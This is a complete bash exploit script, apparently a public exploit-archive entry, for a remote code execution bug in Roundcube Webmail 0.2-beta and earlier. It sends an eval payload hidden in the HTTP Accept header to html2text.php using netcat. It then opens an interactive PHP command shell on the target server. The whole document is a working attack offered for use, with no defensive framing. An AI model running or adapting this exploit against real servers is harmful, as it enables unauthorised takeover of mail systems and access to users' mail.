# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =< 0.2-beta'
echo 'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger <rch2tex@hunger.hu>\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
echo "Required tool(s) missing... (netcat, base64)"
exit 2
fi
USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"
PARAMSIZE=54
HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80
HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"
SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'
HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`
echo -n "Trying to exploit... "
f=0; until [ "$PHPAYLOAD" = "exit" ]; do
PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
&& [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
echo "Bad Server Response :\\"; exit 4; fi;
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
echo "Target has been patched /o\\"; exit 4; fi
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
echo -e "Exploitation failed :(("; exit 4; elif
[ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
if [ $e -gt 0 ]; then echo "$i"; fi
if [ "$i" = "$RETURNCHR" ]; then let e++; fi
done
if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
read PHPAYLOAD
done
RoundCube Webmail versions 0.2b and below remote code execution exploit.